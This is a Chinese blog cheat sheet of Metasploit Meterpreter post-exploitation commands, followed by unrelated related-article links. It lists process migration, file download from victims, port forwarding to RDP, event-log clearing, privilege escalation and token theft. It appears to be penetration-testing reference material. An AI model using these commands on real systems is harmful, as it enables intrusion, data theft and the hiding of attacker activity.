Meterpreter的简单介绍

Meterpreter 是MSF自带一个强大的SHELL,可以执行很多功能。

Meterpreter SHELL

基本操作

meterpreter>background #session隐藏到后台

meterpreter>bgkill #杀掉后台的一个meterpreter

meterpreter>bglist #列出后台的meterpreter

meterpreter>bgrun #运行后台的一个meterpreter

msf> sessions -l #查看回话session的list

msf> sessions 4 #切回四号回话,用于和background反操作

查看系统信息

meterpreter>sysinfo #获取系统信息



meterpreter>getuid #获取当前注入的用户名称

转移注入进程

meterpreter>ps #查看进程list

meterpreter>migrate pid #转移注入点的继承





转移注入进程后,源进程被杀掉,并不影响meterpreter的会话

文件和路径类的操作

meterpreter>ls

meterpreter>pwd

meterpreter>mkdir

meterpreter>mv

meterpreter>rm

meterpreter>rmdir

#以上常见操作不在赘述

meterpreter>show_mount #展示磁盘情况

meterpreter>search -d c:\\ -f *.doc  # -d 路径 -f 文件名模式  搜索文件 例如搜索日志文件 *.evtx

meterpreter>upload /localpath/localfile c:\\remote\\remotepath #上传文件

meterpreter>download c:\\xxx\xxx.xxx /root/... #下载文件

meterpreter>edit xxx  #编辑文件,VIM的



网络配置及其命令

meterpreter>arp #展示arp

meterpreter>getproxy #获取代理信息

meterpreter>ifconfig(ipconfig) #查看网卡信息

meterpreter>route #打印路由

meterpreter>netstat #查看网络连接情况

meterpreter>resolve #dns解析

meterpreter>portfwd #端口转发portfwd  add -l  1122 -p 3389 -r  192.168.250.176



系统操作及其命令

meterpreter>shell #获取cmdshell

meterpreter>clearev #清除event log

meterpreter>execute #执行command

meterpreter>getpid(getuid、getdsid)

meterpreter>getpriv #提权

meterpreter>shutdown #关机

meterpreter>reboot #重启

meterpreter>steal_token #窃取token

meterpreter>sysinfo #系统信息

meterpreter>localtime #获取系统时间

用户接口指令操作

Windows排查

进程

任务管理器看不到,但是tasklist和netstat 可以看到





渗透中Meterpreter基本操作和对应的windows上的排查或者现象的更多相关文章

  1. 在Windows上安装PHP(将PHP加载到Apache中)

    第一步:在 windows.php.net 下载软件包 第二步:解压压缩包,将解压后的目录放到指定目录并重命名 第三步: 创建PHP配置文件,修改Apache配置文件(httpd.conf),将PHP ...

  2. Windows上的Linux容器

    翻译自:https://docs.microsoft.com/en-us/virtualization/windowscontainers/deploy-containers/linux-contai ...

  3. 内网渗透中的反弹Shell与端口转发

    from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload ...

  4. 渗透中Necat的另类用法

    Necat 是一个伟大而实用的用于 TCP 和 UPD 网络连接协议的读写程序.同时 Necat 也被誉为网络中的瑞士军刀,在许多黑客教程中 Necat 也被广泛使用.Necat 最常见用途是设置反向 ...

  5. Memcached在.Net中的基本操作

    Memcached在.Net中的基本操作 一.Memcached ClientLib For .Net 首先,不得不说,许多语言都实现了连接Memcached的客户端,其中以Perl.PHP为主. 仅 ...

  6. Vim中的基本操作

    Vim中的基本操作 vim介绍.实验知识点.Vim中的六种基本模式 2.1 vim 6种模式介绍 从vi衍生出来的Vim具有多种模式,这种独特的设计容易使初学者产生混淆.几乎所有的编辑器都会有插入和执 ...

  7. 【转载】【网络安全】渗透中 PoC、Exp、Payload 与 Shellcode 的区别

    原文地址 渗透中 PoC.Exp.Payload 与 Shellcode 的区别 概念 PoC,全称"Proof of Concept",中文"概念验证",常指 ...

  8. Notepad++中调用cl.exe编译器(Windows)

    Notepad++中调用cl.exe编译器(Windows) 近来在notepad++中写代码,写完后总是习惯性的想去VS里面编译一下,看看代码是否有误.但有时候一些零碎的小文件总是懒得再VS中打开, ...

  9. .pages怎么在windows上打开?Windows下打开在Mac中编辑的.pages文件方法

    .pages怎么在windows上打开?Windows下打开在Mac中编辑的.pages文件方法 1.最简单的方法是修改后缀名为.zip然后解压,解压后就可以看到一张图片,这个就是文档内容了. 2.更 ...

随机推荐

  1. 查看Ubuntu的版本和系统版本

    命令行语句:lsb_release -a 命令行语句:uname -a

  2. MATLAB出现:错误使用 xlsread (line 251)

    背景: matlab 2015b和Excel2003 方法: 改Excel的Com加载项 步骤: 1   2  3   4 

  3. 自定义控件?试试300行代码实现QQ侧滑菜单

    Android自定义控件并没有什么捷径可走,需要不断得模仿练习才能出师.这其中进行模仿练习的demo的选择是至关重要的,最优选择莫过于官方的控件了,但是官方控件动辄就是几千行代码往往可能容易让人望而却 ...

  4. [转]iOS证书(.p12)和描述文件(.mobileprovision)申请

    转载于:http://ask.dcloud.net.cn/article/152 iOS有两种证书和描述文件: 证书类型 使用场景 开发(Development)证书和描述文件 用于开发测试,在HBu ...

  5. zabbix监控系列(5)之通过trap模式监控网络设备

  6. Eclipse中项目全部报错----项目全部打红叉的解决办法

    今天遇到一个超级郁闷的事情,Eclipse新建的项目全部都打有红叉,我起初以为自 己可能是因为这两天一直在配置NDK开发环境方面的东西,是不是一不小心把那个地方给配置了,然后新建项目时项目都会出现红叉 ...

  7. Unity UGUI 的RectTransform参数的设置

    1.改变RectTransform的top GetComponent<RectTransform>().offsetMax = new Vector2(GetComponent<Re ...

  8. 【scala】scala 数组 (三)

    基础内容 1. 数组定义 定长.可变数组的定义;元素添加,删除,排序,求和等常用运算 import scala.collection.mutable.ArrayBuffer import scala. ...

  9. c++单例设计模式---17

    原创博文,转载请标明出处--周学伟  http://www.cnblogs.com/zxouxuewei/ 全局变量在项目中是能不用就不用的,它是一个定时炸弹,是一个不安全隐患,特别是在多线程程序中, ...

  10. CentOS 6.3 + Subversion + Usvn 搭建版本管理服务器

    一. Subversion 简介 Subversion是一个自由,开源的版本控制系统.在Subversion管理下,文件和目录可以超越时空.Subversion将文件存放在中心版本库里.这个版本库很像 ...